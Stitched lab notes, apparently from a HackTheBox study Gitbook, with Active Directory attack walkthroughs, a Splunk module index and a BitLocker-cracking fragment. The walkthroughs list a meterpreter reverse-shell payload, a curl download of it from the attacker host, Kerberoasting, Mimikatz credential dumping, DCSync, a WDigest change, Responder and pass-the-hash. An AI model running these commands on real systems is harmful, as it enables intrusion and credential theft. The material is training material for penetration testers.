"bitlocker\$0" backup.hashes > backup.hash john --wordlist=mut_password.list backup.hash Copy sudo mkdir /media/backup_bitlocker /media/mount sudo losetup -P /dev/loop100 Backup.vhd Copy sudo dislocker -v -V /dev/loop100p2 -u -- /media/backup_bitlocker sudo mount -o loop,rw /media/backup_bitlocker/dislocker-file /media/mount ls -la /media/mount Copy sudo cp /media/mount/SAM /root sudo cp /media/mount/SYSTEM /root Copy john --format=NT --wordlist=mut_password.list admin.hash Copy evil-winrm -i 10.129.211.174 -u administrator -p Liverp00l8! --- # AD Enumeration & Attacks - Skills Assessment Part I | FaresMorcy **Scenario:** A team member started an External Penetration Test and was moved to another urgent project before they could finish. The team member was able to find and exploit a file upload vulnerability after performing recon of the externally-facing web server. Before switching projects, our teammate left a password-protected web shell (with the credentials: `admin:My_W3bsH3ll_P@ssw0rd!`) in place for us to start from in the `/uploads` directory. As part of this assessment, our client, Inlanefreight, has authorized us to see how far we can take our foothold and is interested to see what types of high-risk issues exist within the AD environment. Leverage the web shell to gain an initial foothold in the internal network. Enumerate the Active Directory environment looking for flaws and misconfigurations to move laterally and ultimately achieve domain compromise. Let's navigate to http://ip/uploads and log in using the credentials provided above. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FmyRb2rPbNbBKc1Nxac6y%252FScreenshot%287%29.png%3Falt%3Dmedia%26token%3D2f76c5b2-aea0-455e-9e1e-c5f03781964e&width=768&dpr=4&quality=100&sign=a92a7119&sv=2) ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FXpY381VSB7zwHQEgNI83%252FScreenshot%288%29.png%3Falt%3Dmedia%26token%3Dab25d29d-8d95-42d7-a3a8-ad4d40f28317&width=768&dpr=4&quality=100&sign=4011b15c&sv=2) Answer: JusT\_g3tt1ng\_st@rt3d! Q2) Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer To operate more efficiently from our attack machine, we need to establish a reverse shell. Let's generate a reverse shell payload and start the listener. First, let's identify the system type of the victim machine. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252Fzo1oTRLt605fRW76kRBW%252FScreenshot%289%29.png%3Falt%3Dmedia%26token%3Dc3f609d7-8c9d-449b-8b00-0bb91e505ddd&width=768&dpr=4&quality=100&sign=5bd6a639&sv=2) ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FBiN5Mtf4qoMa3u0b9VUi%252FScreenshot%2810%29.png%3Falt%3Dmedia%26token%3Da76256ed-ad83-427e-b4f4-da4bc0674928&width=768&dpr=4&quality=100&sign=8da646c5&sv=2) Next, let's initiate our listener using Metasploit. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FE3zuJjAfx2AZcsPEwlQu%252FScreenshot%2811%29.png%3Falt%3Dmedia%26token%3Df58a13a3-63ba-4e65-9be2-10686c7e7f04&width=768&dpr=4&quality=100&sign=5058ca6c&sv=2) Let's also start an HTTP server to host the payload, allowing it to be downloaded onto the victim machine. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FcaC7IZLu8TqNZODbKzI5%252FScreenshot%2812%29.png%3Falt%3Dmedia%26token%3Dd262b718-c2ac-4f71-af4c-9ada1494e797&width=768&dpr=4&quality=100&sign=24565d08&sv=2) It is now time to download the payload onto the target machine and execute it. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252Fb775H6sljGXBymx2Rhcf%252FScreenshot%2813%29.png%3Falt%3Dmedia%26token%3D99132e4f-65cc-4387-9c6d-98f5f07bada0&width=768&dpr=4&quality=100&sign=50b03313&sv=2) ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FPoZkpdpVZAdQ8CqYAxZV%252FScreenshot%2814%29.png%3Falt%3Dmedia%26token%3De8e46f22-0339-4ff7-b8ad-fa6c1c75099b&width=768&dpr=4&quality=100&sign=ae808b32&sv=2) Now that we have obtained a reverse shell, we need to use `setspn` to query all Service Principal Names (SPNs) registered within the domain. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FLNMtWSRPgwxMn6doVX9V%252FScreenshot%2815%29.png%3Falt%3Dmedia%26token%3D0cbe0e78-da70-44fa-af98-eeeb66b4744f&width=768&dpr=4&quality=100&sign=492068df&sv=2) Answer: svc\_sql Q3) Crack the account's password. Submit the cleartext value. Let's download PowerView on the Windows system to perform a Kerberoasting attack and extract the service ticket hash for the **svc\_sql** user. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FSA8ppDpf3Uii5XjlmR5B%252FScreenshot%2816%29.png%3Falt%3Dmedia%26token%3D22c257d9-cf0c-4d4e-aec5-37b61f566d26&width=768&dpr=4&quality=100&sign=60949c21&sv=2) ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FzCWuG8UILAHKmv0jKcWt%252FScreenshot%2817%29.png%3Falt%3Dmedia%26token%3De64fd687-a67c-4fbd-96dc-4233a5721974&width=768&dpr=4&quality=100&sign=f2c6206b&sv=2) Answer: lucky7 Q4) Submit the contents of the flag.txt file on the Administrator desktop on MS01 ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FX2wXEgdchiranFcN5vyZ%252FScreenshot%2818%29.png%3Falt%3Dmedia%26token%3D65afa256-0f66-4db7-9f59-6f74dea81a4c&width=768&dpr=4&quality=100&sign=e9057152&sv=2) Answer: spn$_r0ast1ng\_on_@n\_0p3n\_f1re Q5) Find cleartext credentials for another domain user. Submit the username as your answer. Next, we need to connect to **MS01.INLANEFREIGHT.LOCAL** using the credentials we previously obtained. Since we do not have direct access to this machine, we will first set up a port forwarding rule to enable RDP access from our attacker machine. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F1eYvTJoh8OQFpaXsuIUy%252FScreenshot.png%3Falt%3Dmedia%26token%3Dd530f5bb-9dbd-46e8-8858-43405bf3bf69&width=768&dpr=4&quality=100&sign=4a02d83&sv=2) Here is the IP address of the MS01 computer, which will be used as the connection IP address. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252Fdo1n8GFSUYw8p3TFM7Zm%252FScreenshot%281%29.png%3Falt%3Dmedia%26token%3D7712f42f-1bf2-43e2-a253-3e23dcd1bd2d&width=768&dpr=4&quality=100&sign=401f79b0&sv=2) Let's initiate a connection using RDP. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FZOYHYrINip04KFhDHjRv%252FScreenshot%282%29.png%3Falt%3Dmedia%26token%3D5d32cdbe-e6ee-469a-8955-e319fd86e418&width=768&dpr=4&quality=100&sign=245aa7d8&sv=2) I used the drive option to ensure convenient access to our tools. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FQJquPD069JgOH216Bnzd%252FScreenshot.png%3Falt%3Dmedia%26token%3D66d46b8e-ee6a-416e-8657-0c96a3626c90&width=768&dpr=4&quality=100&sign=922ee100&sv=2) Now, let's use Mimikatz to retrieve the cleartext password. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F5ZBD5lej7nN4xQ917qcB%252FScreenshot%281%29.png%3Falt%3Dmedia%26token%3D09f6ef56-9499-4932-9c4f-1997e1b3638c&width=768&dpr=4&quality=100&sign=89d4a222&sv=2) I found a blank password here, which indicates that WDigest needs to be enabled. WDigest is a Windows authentication protocol that stores user credentials in plaintext within memory, making them accessible to tools like Mimikatz for extraction. Answer: tpetty Q6) Submit this user's cleartext password. After this we will need to restart the computer ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F7pRaSz1n6CRb1hP2WDa5%252FScreenshot%282%29.png%3Falt%3Dmedia%26token%3D0306b4f1-58d5-4468-b7cf-8c0d235d8cb9&width=768&dpr=4&quality=100&sign=1ed65e82&sv=2) Now that we’ve logged in again, let’s repeat the same steps we performed using Mimikatz and review the results. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252Fw9onX1rHcIoYJKdXxky0%252FScreenshot%283%29.png%3Falt%3Dmedia%26token%3De50b8b2b-7a6e-41c0-8326-d16a58366c87&width=768&dpr=4&quality=100&sign=446b8b74&sv=2) Answer: Sup3rS3cur3D0m@inU2eR Q7) What attack can this user perform? Let's enumerate the user's access control list to determine their permissions and capabilities. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FY7zuxoQyYImu768RNgNS%252FScreenshot%284%29.png%3Falt%3Dmedia%26token%3D2bbcfde1-f320-4520-b3f1-6436d327c385&width=768&dpr=4&quality=100&sign=ba344f06&sv=2) Answer: DCSync Q8) Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01 We will now use Mimikatz to perform a DCSync attack to retrieve the hash of the Administrator account. Before proceeding, we need to run the command as the user **tpetty**. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FfVWdK6aLQ52A6r94bfp8%252FScreenshot%285%29.png%3Falt%3Dmedia%26token%3Df8a452c3-8270-48be-abfe-cdb2cd8e6f15&width=768&dpr=4&quality=100&sign=8113ccd1&sv=2) We have obtained the administrator's hash, which can be used directly for authentication. However, before proceeding, we need to verify which ports are open on the domain controller at `172.16.6.3`. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FbUE9Za0ugEfrqbnMUMlV%252FScreenshot%286%29.png%3Falt%3Dmedia%26token%3Dc5426df5-b990-4d69-9e70-4e162f6105b5&width=768&dpr=4&quality=100&sign=a608c455&sv=2) It instructs Metasploit to route traffic destined for the `172.16.6.3` subnet through the currently compromised host via the Meterpreter session. Next, let's conduct a port scan to identify the open ports. I discovered that port 5985 is open, which is the default port for WinRM over HTTP. However, before connecting from our attacking machine, we need to set up port forwarding. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F156Hf3apQnQPMjCW1Shh%252FScreenshot%287%29.png%3Falt%3Dmedia%26token%3D8cef8281-5a10-4c14-a14f-4161c420583b&width=768&dpr=4&quality=100&sign=62803065&sv=2) Next, we will use `Evil-WinRM` from the attacking machine to establish a connection to the domain controller using the provided credentials. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F8IhxlP8Wo025sKpKt0Wf%252FScreenshot%288%29.png%3Falt%3Dmedia%26token%3De2b1849b-4cda-4ba7-939e-e15bbfe69a65&width=768&dpr=4&quality=100&sign=c761562&sv=2) Answer: r3plicat1on\_m@st3r! [PreviousActive Directory Enumeration & Attacks](https://faresbltagy.gitbook.io/footprintinglabs/active-directory-enumeration-and-attacks/active-directory-enumeration-and-attacks) [NextAD Enumeration & Attacks - Skills Assessment Part II](https://faresbltagy.gitbook.io/footprintinglabs/active-directory-enumeration-and-attacks/ad-enumeration-and-attacks-skills-assessment-part-ii) Last updated 6 months ago Copy msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.45 LPORT=4444 -f exe -o payload.exe Copy msfconsole -q use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 10.10.15.45 set LPORT 4444 exploit Copy python3 -m http.server Copy curl http://10.10.15.45:8000/payload.exe -O C:\Windows\System32\payload.exe Copy setspn -Q */* Copy Get-DomainUser -Identity svc_sql | Get-DomainSPNTicket -Format Hashcat Copy hashcat -m 13100 svcsql_tgs /usr/share/wordlists/rockyou.txt Copy net use \\MS01\c$ /user:INLANEFREIGHT.LOCAL\svc_sql lucky7 type \\ms01\c$\Users\Administrator\Desktop\flag.txt Copy netsh.exe interface portproxy add v4tov4 listenport=8888 listenaddress=10.129.253.79 connectport=3389 connectaddress=172.16.6.50 Copy xfreerdp /u:svc_sql /p:lucky7 /v:10.129.253.79:8888 /dynamic-resolution /drive:Shared,//home/htb-ac-1224655/ Copy .\mimikatz.exe privilege::debug sekurlsa::logonpasswords Copy reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 shutdown.exe /r /t 0 /f Copy Import-Module .\PowerView.ps1 $sid = Convert-NameToSid tpetty Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid} Copy runas /user:INLANEFREIGHT\tpetty powershell.exe privilege::debug lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator Copy run autoroute -s 172.16.6.3 run autoroute -p Copy use auxiliary/scanner/portscan/tcp set rhosts 172.16.6.3 exploit Copy portfwd add -l 6666 -p 5985 -r 172.16.6.3 Copy evil-winrm -i 10.10.15.16 --port 6666 -u administrator -H 27dedb1dab4d8545c6e1c66fba077da0 --- # Understanding Log Sources & Investigating with Splunk Module | FaresMorcy [Introduction To Splunk & SPL](https://faresbltagy.gitbook.io/footprintinglabs/soc-hackthebox-notes-and-labs/understanding-log-sources-and-investigating-with-splunk-module/introduction-to-splunk-and-spl) [Using Splunk Applications](https://faresbltagy.gitbook.io/footprintinglabs/soc-hackthebox-notes-and-labs/understanding-log-sources-and-investigating-with-splunk-module/using-splunk-applications) [Intrusion Detection With Splunk (Real-world Scenario)](https://faresbltagy.gitbook.io/footprintinglabs/soc-hackthebox-notes-and-labs/understanding-log-sources-and-investigating-with-splunk-module/intrusion-detection-with-splunk-real-world-scenario) [Detecting Attacker Behavior With Splunk Based On TTPs](https://faresbltagy.gitbook.io/footprintinglabs/soc-hackthebox-notes-and-labs/understanding-log-sources-and-investigating-with-splunk-module/detecting-attacker-behavior-with-splunk-based-on-ttps) [Detecting Attacker Behavior With Splunk Based On Analytics](https://faresbltagy.gitbook.io/footprintinglabs/soc-hackthebox-notes-and-labs/understanding-log-sources-and-investigating-with-splunk-module/detecting-attacker-behavior-with-splunk-based-on-analytics) [Skills Assessment](https://faresbltagy.gitbook.io/footprintinglabs/soc-hackthebox-notes-and-labs/understanding-log-sources-and-investigating-with-splunk-module/skills-assessment) [PreviousIntroduction to Threat Hunting & Hunting With Elastic Module](https://faresbltagy.gitbook.io/footprintinglabs/soc-hackthebox-notes-and-labs/introduction-to-threat-hunting-and-hunting-with-elastic-module) [NextIntroduction To Splunk & SPL](https://faresbltagy.gitbook.io/footprintinglabs/soc-hackthebox-notes-and-labs/understanding-log-sources-and-investigating-with-splunk-module/introduction-to-splunk-and-spl) Last updated 1 year ago --- # AD Enumeration & Attacks - Skills Assessment Part II | FaresMorcy ### [](https://faresbltagy.gitbook.io/footprintinglabs/active-directory-enumeration-and-attacks/ad-enumeration-and-attacks-skills-assessment-part-ii#scenario) Scenario Our client Inlanefreight has contracted us again to perform a full-scope internal penetration test. The client is looking to find and remediate as many flaws as possible before going through a merger & acquisition process. The new CISO is particularly worried about more nuanced AD security flaws that may have gone unnoticed during previous penetration tests. The client is not concerned about stealth/evasive tactics and has also provided us with a Parrot Linux VM within the internal network to get the best possible coverage of all angles of the network and the Active Directory environment. Connect to the internal attack host via SSH (you can also connect to it using `xfreerdp` as shown in the beginning of this module) and begin looking for a foothold into the domain. Once you have a foothold, enumerate the domain and look for flaws that can be utilized to move laterally, escalate privileges, and achieve domain compromise. Q1) Obtain a password hash for a domain user account that can be leveraged to gain a foothold in the domain. What is the account name? Let's begin with starting responder with the default settings Copy sudo responder -I ens224 ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FdU1zSUybpkYD7AJQZvsO%252FScreenshot.png%3Falt%3Dmedia%26token%3D8b3268b2-a383-40b0-990b-6e96bf43750f&width=768&dpr=4&quality=100&sign=77f2b41e&sv=2) Let's review the Responder logs to determine if any hashes were captured. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252Fi2yWEg66sYTRGhymYbhQ%252FScreenshot%281%29.png%3Falt%3Dmedia%26token%3Dc5c1eb38-73c0-465d-8235-694f5e015b3c&width=768&dpr=4&quality=100&sign=ec0287f0&sv=2) Answer: `AB920` Q2) What is this user's cleartext password? Let's save the hash to a file and attempt to crack it using Hashcat in order to retrieve the plaintext password. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FUnOubZwkV6C5qcdF2ap6%252FScreenshot%282%29.png%3Falt%3Dmedia%26token%3Da7a1d0ca-73f2-482e-88da-17b7ab694153&width=768&dpr=4&quality=100&sign=7802ffce&sv=2) Answer: `weasal` Q3) Submit the contents of the C:\\flag.txt file on MS01. Let's check which hosts are alive in the domain first ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F8K4lkZFMhuHsI1POfXzo%252FScreenshot%283%29.png%3Falt%3Dmedia%26token%3Da3ac8327-9809-4293-bce9-fec30ca12148&width=768&dpr=4&quality=100&sign=29447c04&sv=2) Let's save these IP addresses to a file and use Nmap to enumerate them, identifying which one corresponds to MS01. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FCeEBfxtXCQfBez2yE2VK%252FScreenshot%285%29.png%3Falt%3Dmedia%26token%3Dc9da459a-d44d-434d-b166-8f7150242f41&width=768&dpr=4&quality=100&sign=eeb5095e&sv=2) * **172.16.7.3:** `DC01` * **172.16.7.50:** `MS01` * **172.16.7.60:** `SQL01` * **172.16.7.240:** `Our Parrot machine` Let's verify whether the user `**ab920**` can log in to `**172.16.7.50**`, and determine which authentication protocol is supported for the connection. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FPH9RZvUvc6PEdmcdiLys%252FScreenshot%284%29.png%3Falt%3Dmedia%26token%3D18fa3327-d188-480e-a1a5-f733d3d72b21&width=768&dpr=4&quality=100&sign=33f89b10&sv=2) Let's use `Evil-WinRM` to authenticate with the `**ab920**` account. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FpT5h9YYdirGJfGnfOO0C%252FScreenshot%286%29.png%3Falt%3Dmedia%26token%3D222dc6ca-2b03-4168-9a79-3a4bf546fa3a&width=768&dpr=4&quality=100&sign=1a685a9b&sv=2) Answer: `aud1t_gr0up_m3mbersh1ps!` Q4) Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain. It is now time to create a list of target users to be used in the upcoming password spraying attack. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F5y0pl5Qmbqvcb0IXjcWp%252FScreenshot%289%29.png%3Falt%3Dmedia%26token%3D179c586e-160e-4122-a810-08b65ce7fc0d&width=768&dpr=4&quality=100&sign=c103c457&sv=2) We now have 2,904 valid usernames in the domain. Let's now proceed with the password spraying attack. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F8nfpdLHVZRGpiy1wGBQs%252FScreenshot%2810%29.png%3Falt%3Dmedia%26token%3D09337323-b026-447b-9d80-146cd105a3fd&width=768&dpr=4&quality=100&sign=e155fe5&sv=2) Answer: `BR086` Q5) What is this user's password? Answer: `Welcome1` Q6) Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file? Let's perform share enumeration to identify any shared resources on which we may have read access. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FEcPJpwCCmCx3QxT6Kg46%252FScreenshot%2814%29.png%3Falt%3Dmedia%26token%3D65b2f217-5ed2-43cd-a7d1-70598d610e3a&width=768&dpr=4&quality=100&sign=c885d1a5&sv=2) I found a shared folder named **'Department Shares'** to which we have read access. Let's proceed to review its contents. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FDQ0MSV9llYrbf35MoRnY%252FScreenshot%2815%29.png%3Falt%3Dmedia%26token%3D09c76ed3-d51d-45fa-964d-b5a98ea9aae3&width=768&dpr=4&quality=100&sign=4b5af2de&sv=2) I found a file named `**web.config**` in the results. Let's review its contents to identify any relevant information. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FQqQXn8M9HarQVbEfWdvV%252FScreenshot%2816%29.png%3Falt%3Dmedia%26token%3Da9e329ef-8142-4861-99bd-b292391c5aa3&width=768&dpr=4&quality=100&sign=f3fb40cb&sv=2) ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FgK2Z5RZdaYWcvsafUhrI%252FScreenshot%2817%29.png%3Falt%3Dmedia%26token%3D6124cbae-5cca-4121-846a-f7f9470bb4f4&width=768&dpr=4&quality=100&sign=3b1523d9&sv=2) Answer: `D@ta_bAse_adm1n!` Q7) Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. Next, we will use the obtained credentials to authenticate to SQL01 via mssqlclient. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FaADFyhUIE8yhOZmI7EhP%252FScreenshot%2818%29.png%3Falt%3Dmedia%26token%3Da5a417dc-80e6-46bd-a374-0c3dea74b200&width=768&dpr=4&quality=100&sign=ee4a9dea&sv=2) We have successfully accessed SQL01; however, we do not have the necessary permissions to read the flag. Let's review our current permissions. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FBFqh9MWRt0j2b7kL4UKn%252FScreenshot%2819%29.png%3Falt%3Dmedia%26token%3Ddc668ccd-63f7-4252-a7d0-6df5b875a005&width=768&dpr=4&quality=100&sign=23ea5b1&sv=2) We have the **SeImpersonatePrivilege** enabled, which can be leveraged for privilege escalation by exploiting the **PrintNightmare** vulnerability. Let's generate a payload using **msfvenom**, and also obtain **PrintSpoofer.exe**. We will download both files to the **SQL01** server. 